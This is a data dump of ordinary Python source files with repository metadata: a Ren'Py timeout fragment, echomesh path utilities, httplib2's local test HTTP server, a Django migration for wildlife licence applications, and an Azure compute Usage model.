        pygame.time.set_timer(TIMEEVENT, 0)
        pygame.time.set_timer(REDRAW, 0)

        self.consider_gc()

        renpy.game.context().runtime += end_time - start_time

        # Restart the old interaction, which also causes a
        # redraw if needed.
        self.restart_interaction = True

        renpy.plog(1, "end interact_core")

        # print("It took", frames, "frames.")
def timeout(self, offset):
    """Schedule a timeout `offset` seconds after the last event.

    Negative offsets are ignored. When a timeout is already pending,
    the earlier of the two deadlines wins.
    """
    if offset < 0:
        return

    deadline = self.event_time + offset

    if self.timeout_time:
        self.timeout_time = min(self.timeout_time, deadline)
    else:
        self.timeout_time = deadline
def finish_pending(self):
    """Finish deferred work; currently completes any background screenshot."""
    self.check_background_screenshot()
| true | true |
f72ecbc1483d9983735ec38c6681592f9d32e01b | 2,625 | py | Python | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | 1 | 2019-06-27T11:34:13.000Z | 2019-06-27T11:34:13.000Z | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | null | null | null | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.base import MakeEmptyProject
from echomesh.base import Platform
import getpass
import os
import os.path
import sys
ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES = True
# If this is True, you want Echomesh to use its own external packages in
# preference to any you might have installed in your system path.
CODE_PATH = os.path.abspath(sys.path[0])
EXTERNAL_CODE_PATH = os.path.join(CODE_PATH, 'external')
ECHOMESH_PATH = os.path.dirname(os.path.dirname(CODE_PATH))
BINARY_PATH = os.path.join(ECHOMESH_PATH, 'bin', Platform.PLATFORM)
PROJECT_PATH = None
COMMAND_PATH = None
ASSET_PATH = None
_REQUIRED_DIRECTORIES = 'asset', 'cache', 'command', 'log'
def _possible_project(path):
    """Return True if `path` contains every directory an echomesh project needs."""
    return all(
        os.path.exists(os.path.join(path, d)) for d in _REQUIRED_DIRECTORIES)
def set_project_path(project_path=None, show_error=True, prompt=True):
    """Locate the enclosing echomesh project and make it current.

    Walks upward from `project_path` (default: the current directory)
    looking for a directory containing the required project
    subdirectories. On success sets the PROJECT_PATH / COMMAND_PATH /
    ASSET_PATH globals and chdirs into the project; returns True.

    If no project is found: with `prompt`, offers to create an empty
    project at the original path (returning False if declined);
    otherwise falls back to ECHOMESH_PATH, optionally printing an error
    when `show_error` is set.
    """
    original_path = os.path.abspath(os.path.expanduser(project_path or os.curdir))
    path = original_path
    global PROJECT_PATH, COMMAND_PATH, ASSET_PATH
    while not _possible_project(path):
        p = os.path.dirname(path)
        if p != path:
            # Not at the filesystem root yet: keep walking upward.
            path = p
            continue
        if prompt:
            if MakeEmptyProject.ask_to_make_empty_project(original_path):
                path = original_path
                break
            else:
                PROJECT_PATH = None
                return False
        if show_error:
            print("\nYour path %s isn't in an echomesh project." % original_path)
            print("Defaulting to the echomesh path %s." % ECHOMESH_PATH)
        path = ECHOMESH_PATH
        break
    PROJECT_PATH = path
    COMMAND_PATH = os.path.join(path, 'command')
    ASSET_PATH = os.path.join(path, 'asset')
    os.chdir(path)
    return True
set_project_path()
def info():
    """Return a mapping of human-readable labels to the configured paths."""
    paths = {
        'Asset path': ASSET_PATH,
        'Code path': CODE_PATH,
        'Command path': COMMAND_PATH,
        'External code path': EXTERNAL_CODE_PATH,
        'Project path': PROJECT_PATH,
        'echomesh path': ECHOMESH_PATH,
    }
    return paths
def fix_sys_path():
    """Make echomesh's bundled external packages and platform binaries importable."""
    for path in (EXTERNAL_CODE_PATH, BINARY_PATH):
        if path in sys.path:
            continue
        if ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES:
            # Insert just after the script directory so the bundled
            # packages shadow any system-installed versions.
            sys.path.insert(1, path)
        else:
            sys.path.append(path)
_HOME_VARIABLE_FIXED = False

# HACK!
def fix_home_directory_environment_variable():
    """On Debian (Raspberry Pi), point $HOME at user pi's home when running as root.

    Runs at most once per process; a no-op on other platforms.
    """
    global _HOME_VARIABLE_FIXED
    if Platform.PLATFORM != Platform.DEBIAN or _HOME_VARIABLE_FIXED:
        return
    # If running as root, export user pi's home directory as $HOME.
    if getpass.getuser() == 'root':
        os.environ['HOME'] = '/home/pi'
    _HOME_VARIABLE_FIXED = True
| 28.846154 | 82 | 0.719238 | from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.base import MakeEmptyProject
from echomesh.base import Platform
import getpass
import os
import os.path
import sys
ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES = True
CODE_PATH = os.path.abspath(sys.path[0])
EXTERNAL_CODE_PATH = os.path.join(CODE_PATH, 'external')
ECHOMESH_PATH = os.path.dirname(os.path.dirname(CODE_PATH))
BINARY_PATH = os.path.join(ECHOMESH_PATH, 'bin', Platform.PLATFORM)
PROJECT_PATH = None
COMMAND_PATH = None
ASSET_PATH = None
_REQUIRED_DIRECTORIES = 'asset', 'cache', 'command', 'log'
def _possible_project(path):
for d in _REQUIRED_DIRECTORIES:
if not os.path.exists(os.path.join(path, d)):
return False
return True
def set_project_path(project_path=None, show_error=True, prompt=True):
original_path = os.path.abspath(os.path.expanduser(project_path or os.curdir))
path = original_path
global PROJECT_PATH, COMMAND_PATH, ASSET_PATH
while not _possible_project(path):
p = os.path.dirname(path)
if p != path:
path = p
continue
if prompt:
if MakeEmptyProject.ask_to_make_empty_project(original_path):
path = original_path
break
else:
PROJECT_PATH = None
return False
if show_error:
print("\nYour path %s isn't in an echomesh project." % original_path)
print("Defaulting to the echomesh path %s." % ECHOMESH_PATH)
path = ECHOMESH_PATH
break
PROJECT_PATH = path
COMMAND_PATH = os.path.join(path, 'command')
ASSET_PATH = os.path.join(path, 'asset')
os.chdir(path)
return True
set_project_path()
def info():
return {
'Asset path': ASSET_PATH,
'Code path': CODE_PATH,
'Command path': COMMAND_PATH,
'External code path': EXTERNAL_CODE_PATH,
'Project path': PROJECT_PATH,
'echomesh path': ECHOMESH_PATH,
}
def fix_sys_path():
for path in EXTERNAL_CODE_PATH, BINARY_PATH:
if path not in sys.path:
if ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES:
sys.path.insert(1, path)
else:
sys.path.append(path)
_HOME_VARIABLE_FIXED = False
# HACK!
def fix_home_directory_environment_variable():
if Platform.PLATFORM == Platform.DEBIAN:
global _HOME_VARIABLE_FIXED
if not _HOME_VARIABLE_FIXED:
# If running as root, export user pi's home directory as $HOME.
if getpass.getuser() == 'root':
os.environ['HOME'] = '/home/pi'
_HOME_VARIABLE_FIXED = True
| true | true |
f72eccac332916dcfea55705b3733758b36e79f1 | 3,779 | py | Python | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 698 | 2015-06-02T19:18:35.000Z | 2022-03-29T16:57:15.000Z | import logging
import os
import select
import SimpleHTTPServer
import socket
import SocketServer
import threading
HERE = os.path.dirname(__file__)
logger = logging.getLogger(__name__)
class ThisDirHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """Request handler that serves files from this test module's directory."""

    def translate_path(self, path):
        # Strip any query string or fragment before mapping to the filesystem.
        bare = path.split('?', 1)[0].split('#', 1)[0]
        parts = [piece for piece in bare.split('/') if piece]
        return os.path.join(HERE, *parts)

    def log_message(self, s, *args):
        # output via logging so nose can catch it
        logger.info(s, *args)
class ShutdownServer(SocketServer.TCPServer):
    """Mixin that allows serve_forever to be shut down.

    The methods in this mixin are backported from SocketServer.py in the Python
    2.6.4 standard library. The mixin is unnecessary in 2.6 and later, when
    BaseServer supports the shutdown method directly.
    """

    def __init__(self, use_tls, *args, **kwargs):
        # Remember whether to wrap the listening socket in TLS at bind time.
        self.__use_tls = use_tls
        SocketServer.TCPServer.__init__(self, *args, **kwargs)
        # Set once serve_forever has fully stopped; shutdown() waits on it.
        self.__is_shut_down = threading.Event()
        self.__serving = False

    def server_bind(self):
        SocketServer.TCPServer.server_bind(self)
        if self.__use_tls:
            import ssl
            # Wrap the listening socket with the test key/cert that live
            # next to this module. NOTE(review): positional arguments are
            # (keyfile, certfile, server_side) -- confirm against the
            # Python 2 ssl.wrap_socket documentation.
            self.socket = ssl.wrap_socket(self.socket,
                os.path.join(os.path.dirname(__file__), 'server.key'),
                os.path.join(os.path.dirname(__file__), 'server.pem'),
                True
            )

    def serve_forever(self, poll_interval=0.1):
        """Handle one request at a time until shutdown.

        Polls for shutdown every poll_interval seconds. Ignores
        self.timeout. If you need to do periodic tasks, do them in
        another thread.
        """
        self.__serving = True
        self.__is_shut_down.clear()
        while self.__serving:
            # Wake up periodically so a shutdown() request is noticed
            # even when no connections arrive.
            r, w, e = select.select([self.socket], [], [], poll_interval)
            if r:
                self._handle_request_noblock()
        self.__is_shut_down.set()

    def shutdown(self):
        """Stops the serve_forever loop.

        Blocks until the loop has finished. This must be called while
        serve_forever() is running in another thread, or it will deadlock.
        """
        self.__serving = False
        self.__is_shut_down.wait()

    def handle_request(self):
        """Handle one request, possibly blocking.

        Respects self.timeout.
        """
        # Support people who used socket.settimeout() to escape
        # handle_request before self.timeout was available.
        timeout = self.socket.gettimeout()
        if timeout is None:
            timeout = self.timeout
        elif self.timeout is not None:
            timeout = min(timeout, self.timeout)
        fd_sets = select.select([self], [], [], timeout)
        if not fd_sets[0]:
            self.handle_timeout()
            return
        self._handle_request_noblock()

    def _handle_request_noblock(self):
        """Handle one request, without blocking.

        I assume that select.select has returned that the socket is
        readable before this function was called, so there should be
        no risk of blocking in get_request().
        """
        try:
            request, client_address = self.get_request()
        except socket.error:
            # The client may have gone away between select and accept.
            return
        if self.verify_request(request, client_address):
            try:
                self.process_request(request, client_address)
            except:
                self.handle_error(request, client_address)
                self.close_request(request)
def start_server(handler, use_tls=False):
    """Start a ShutdownServer for `handler` on an OS-assigned port.

    The server runs in a background thread; returns (server, port).
    """
    server = ShutdownServer(use_tls, ("", 0), handler)
    threading.Thread(target=server.serve_forever).start()
    port = server.socket.getsockname()[1]
    return server, port
| 33.149123 | 79 | 0.629796 | import logging
import os
import select
import SimpleHTTPServer
import socket
import SocketServer
import threading
HERE = os.path.dirname(__file__)
logger = logging.getLogger(__name__)
class ThisDirHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
path = path.split('?', 1)[0].split('#', 1)[0]
return os.path.join(HERE, *filter(None, path.split('/')))
def log_message(self, s, *args):
logger.info(s, *args)
class ShutdownServer(SocketServer.TCPServer):
def __init__(self, use_tls, *args, **kwargs):
self.__use_tls = use_tls
SocketServer.TCPServer.__init__(self, *args, **kwargs)
self.__is_shut_down = threading.Event()
self.__serving = False
def server_bind(self):
SocketServer.TCPServer.server_bind(self)
if self.__use_tls:
import ssl
self.socket = ssl.wrap_socket(self.socket,
os.path.join(os.path.dirname(__file__), 'server.key'),
os.path.join(os.path.dirname(__file__), 'server.pem'),
True
)
def serve_forever(self, poll_interval=0.1):
self.__serving = True
self.__is_shut_down.clear()
while self.__serving:
r, w, e = select.select([self.socket], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.__is_shut_down.set()
def shutdown(self):
self.__serving = False
self.__is_shut_down.wait()
def handle_request(self):
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.close_request(request)
def start_server(handler, use_tls=False):
httpd = ShutdownServer(use_tls, ("", 0), handler)
threading.Thread(target=httpd.serve_forever).start()
_, port = httpd.socket.getsockname()
return httpd, port
| true | true |
f72ece2577e1c7ce79389ad64b2bed43d07b14b5 | 9,235 | py | Python | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | null | null | null | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | 11 | 2019-03-19T02:03:11.000Z | 2019-05-31T07:20:59.000Z | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | 2 | 2020-08-10T10:17:10.000Z | 2021-10-31T23:20:53.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-06-10 08:47
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the wl_applications app.

    Auto-generated by Django 1.9.5. Edit with care: manual changes are
    normally lost when migrations are regenerated.
    """
    initial = True
    dependencies = [
    ]
    # One CreateModel per table. Several models below are multi-table
    # children of ApplicationLogEntry (see their ``bases`` entries and the
    # ``applicationlogentry_ptr`` parent-link fields).
    operations = [
        migrations.CreateModel(
            name='Application',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('customer_status', models.CharField(choices=[('draft', 'Draft'), ('under_review', 'Under Review'), ('id_required', 'Identification Required'), ('returns_required', 'Returns Completion Required'), ('amendment_required', 'Amendment Required'), ('id_and_amendment_required', 'Identification/Amendments Required'), ('id_and_returns_required', 'Identification/Returns Required'), ('returns_and_amendment_required', 'Returns/Amendments Required'), ('id_and_returns_and_amendment_required', 'Identification/Returns/Amendments Required'), ('approved', 'Approved'), ('declined', 'Declined')], default='draft', max_length=40, verbose_name='Customer Status')),
                ('data', django.contrib.postgres.fields.jsonb.JSONField()),
                ('correctness_disclaimer', models.BooleanField(default=False)),
                ('further_information_disclaimer', models.BooleanField(default=False)),
                ('lodgement_number', models.CharField(blank=True, default='', max_length=9)),
                ('lodgement_sequence', models.IntegerField(blank=True, default=0)),
                ('lodgement_date', models.DateField(blank=True, null=True)),
                ('processing_status', models.CharField(choices=[('draft', 'Draft'), ('new', 'New'), ('renewal', 'Renewal'), ('ready_for_action', 'Ready for Action'), ('awaiting_applicant_response', 'Awaiting Applicant Response'), ('awaiting_assessor_response', 'Awaiting Assessor Response'), ('awaiting_responses', 'Awaiting Responses'), ('ready_for_conditions', 'Ready for Conditions'), ('ready_to_issue', 'Ready to Issue'), ('issued', 'Issued'), ('declined', 'Declined')], default='draft', max_length=30, verbose_name='Processing Status')),
                ('id_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_update', 'Awaiting Update'), ('updated', 'Updated'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Identification Check Status')),
                ('returns_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_returns', 'Awaiting Returns'), ('completed', 'Completed'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Return Check Status')),
                ('character_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Character Check Status')),
                ('review_status', models.CharField(choices=[('not_reviewed', 'Not Reviewed'), ('awaiting_amendments', 'Awaiting Amendments'), ('amended', 'Amended'), ('accepted', 'Accepted')], default='not_reviewed', max_length=30, verbose_name='Review Status')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='ApplicationCondition',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('order', models.IntegerField()),
            ],
        ),
        # Base table for the log-entry hierarchy below.
        migrations.CreateModel(
            name='ApplicationLogEntry',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('text', models.TextField(blank=True)),
                ('created', models.DateField(auto_now_add=True)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='AssessmentCondition',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('order', models.IntegerField()),
                ('acceptance_status', models.CharField(choices=[('not_specified', 'Not Specified'), ('accepted', 'Accepted'), ('declined', 'Declined')], default='not_specified', max_length=20, verbose_name='Acceptance Status')),
            ],
        ),
        migrations.CreateModel(
            name='AmendmentRequest',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('status', models.CharField(choices=[('requested', 'Requested'), ('amended', 'Amended')], default='requested', max_length=30, verbose_name='Status')),
                ('reason', models.CharField(choices=[('insufficient_detail', 'The information provided was insufficient'), ('missing_information', 'There was missing information'), ('other', 'Other')], default='insufficient_detail', max_length=30, verbose_name='Reason')),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
        migrations.CreateModel(
            name='Assessment',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('status', models.CharField(choices=[('awaiting_assessment', 'Awaiting Assessment'), ('assessed', 'Assessed')], default='awaiting_assessment', max_length=20, verbose_name='Status')),
                ('comment', models.TextField(blank=True)),
                ('purpose', models.TextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
        migrations.CreateModel(
            name='CustomLogEntry',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('subject', models.CharField(blank=True, max_length=200, verbose_name='Subject / Description')),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
        migrations.CreateModel(
            name='EmailLogEntry',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('subject', models.CharField(blank=True, max_length=500)),
                ('to', models.CharField(blank=True, max_length=500, verbose_name='To')),
                ('from_email', models.CharField(blank=True, max_length=200, verbose_name='From')),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
        migrations.CreateModel(
            name='IDRequest',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('reason', models.CharField(choices=[('missing', 'There is currently no Photographic Identification uploaded'), ('expired', 'The current identification has expired'), ('not_recognised', 'The current identification is not recognised by the Department of Parks and Wildlife'), ('illegible', 'The current identification image is of poor quality and cannot be made out.'), ('other', 'Other')], default='missing', max_length=30, verbose_name='Reason')),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
        migrations.CreateModel(
            name='ReturnsRequest',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('reason', models.CharField(choices=[('outstanding', 'There are currently outstanding returns for the previous licence'), ('other', 'Other')], default='outstanding', max_length=30, verbose_name='Reason')),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
    ]
| 67.408759 | 666 | 0.63216 |
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Application',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_status', models.CharField(choices=[('draft', 'Draft'), ('under_review', 'Under Review'), ('id_required', 'Identification Required'), ('returns_required', 'Returns Completion Required'), ('amendment_required', 'Amendment Required'), ('id_and_amendment_required', 'Identification/Amendments Required'), ('id_and_returns_required', 'Identification/Returns Required'), ('returns_and_amendment_required', 'Returns/Amendments Required'), ('id_and_returns_and_amendment_required', 'Identification/Returns/Amendments Required'), ('approved', 'Approved'), ('declined', 'Declined')], default='draft', max_length=40, verbose_name='Customer Status')),
('data', django.contrib.postgres.fields.jsonb.JSONField()),
('correctness_disclaimer', models.BooleanField(default=False)),
('further_information_disclaimer', models.BooleanField(default=False)),
('lodgement_number', models.CharField(blank=True, default='', max_length=9)),
('lodgement_sequence', models.IntegerField(blank=True, default=0)),
('lodgement_date', models.DateField(blank=True, null=True)),
('processing_status', models.CharField(choices=[('draft', 'Draft'), ('new', 'New'), ('renewal', 'Renewal'), ('ready_for_action', 'Ready for Action'), ('awaiting_applicant_response', 'Awaiting Applicant Response'), ('awaiting_assessor_response', 'Awaiting Assessor Response'), ('awaiting_responses', 'Awaiting Responses'), ('ready_for_conditions', 'Ready for Conditions'), ('ready_to_issue', 'Ready to Issue'), ('issued', 'Issued'), ('declined', 'Declined')], default='draft', max_length=30, verbose_name='Processing Status')),
('id_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_update', 'Awaiting Update'), ('updated', 'Updated'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Identification Check Status')),
('returns_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_returns', 'Awaiting Returns'), ('completed', 'Completed'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Return Check Status')),
('character_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Character Check Status')),
('review_status', models.CharField(choices=[('not_reviewed', 'Not Reviewed'), ('awaiting_amendments', 'Awaiting Amendments'), ('amended', 'Amended'), ('accepted', 'Accepted')], default='not_reviewed', max_length=30, verbose_name='Review Status')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ApplicationCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
],
),
migrations.CreateModel(
name='ApplicationLogEntry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField(blank=True)),
('created', models.DateField(auto_now_add=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AssessmentCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
('acceptance_status', models.CharField(choices=[('not_specified', 'Not Specified'), ('accepted', 'Accepted'), ('declined', 'Declined')], default='not_specified', max_length=20, verbose_name='Acceptance Status')),
],
),
migrations.CreateModel(
name='AmendmentRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('requested', 'Requested'), ('amended', 'Amended')], default='requested', max_length=30, verbose_name='Status')),
('reason', models.CharField(choices=[('insufficient_detail', 'The information provided was insufficient'), ('missing_information', 'There was missing information'), ('other', 'Other')], default='insufficient_detail', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='Assessment',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('awaiting_assessment', 'Awaiting Assessment'), ('assessed', 'Assessed')], default='awaiting_assessment', max_length=20, verbose_name='Status')),
('comment', models.TextField(blank=True)),
('purpose', models.TextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='CustomLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=200, verbose_name='Subject / Description')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='EmailLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=500)),
('to', models.CharField(blank=True, max_length=500, verbose_name='To')),
('from_email', models.CharField(blank=True, max_length=200, verbose_name='From')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='IDRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('missing', 'There is currently no Photographic Identification uploaded'), ('expired', 'The current identification has expired'), ('not_recognised', 'The current identification is not recognised by the Department of Parks and Wildlife'), ('illegible', 'The current identification image is of poor quality and cannot be made out.'), ('other', 'Other')], default='missing', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='ReturnsRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('outstanding', 'There are currently outstanding returns for the previous licence'), ('other', 'Other')], default='outstanding', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
]
| true | true |
f72ece5f6adcb5d43dae9e1a19b386550d5d1375 | 1,895 | py | Python | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2022-03-30T22:39:15.000Z | 2022-03-30T22:39:15.000Z | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2017-01-20T18:25:46.000Z | 2017-05-12T21:31:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Usage(Model):
    """Describes Compute Resource Usage.
    Variables are only populated by the server, and will be ignored when
    sending a request.
    All required parameters must be populated in order to send to Azure.
    :ivar unit: Required. An enum describing the unit of usage measurement.
     Default value: "Count" .
    :vartype unit: str
    :param current_value: Required. The current usage of the resource.
    :type current_value: int
    :param limit: Required. The maximum permitted usage of the resource.
    :type limit: long
    :param name: Required. The name of the type of usage.
    :type name: ~azure.mgmt.compute.v2016_03_30.models.UsageName
    """
    # msrest validation rules: every field is mandatory and ``unit`` is a
    # server-populated constant.
    _validation = {
        'unit': {'required': True, 'constant': True},
        'current_value': {'required': True},
        'limit': {'required': True},
        'name': {'required': True},
    }
    # Maps Python attribute names to wire (JSON) keys and msrest types.
    # Note: 'long' here is an msrest serialization type, not Python 2's long.
    _attribute_map = {
        'unit': {'key': 'unit', 'type': 'str'},
        'current_value': {'key': 'currentValue', 'type': 'int'},
        'limit': {'key': 'limit', 'type': 'long'},
        'name': {'key': 'name', 'type': 'UsageName'},
    }
    # Constant class attribute: the only unit the service reports.
    unit = "Count"
    def __init__(self, *, current_value: int, limit: int, name, **kwargs) -> None:
        super(Usage, self).__init__(**kwargs)
        self.current_value = current_value  # Current usage of the resource.
        self.limit = limit  # Maximum permitted usage of the resource.
        self.name = name  # UsageName describing the usage type.
from msrest.serialization import Model
class Usage(Model):
_validation = {
'unit': {'required': True, 'constant': True},
'current_value': {'required': True},
'limit': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'unit': {'key': 'unit', 'type': 'str'},
'current_value': {'key': 'currentValue', 'type': 'int'},
'limit': {'key': 'limit', 'type': 'long'},
'name': {'key': 'name', 'type': 'UsageName'},
}
unit = "Count"
def __init__(self, *, current_value: int, limit: int, name, **kwargs) -> None:
super(Usage, self).__init__(**kwargs)
self.current_value = current_value
self.limit = limit
self.name = name
| true | true |
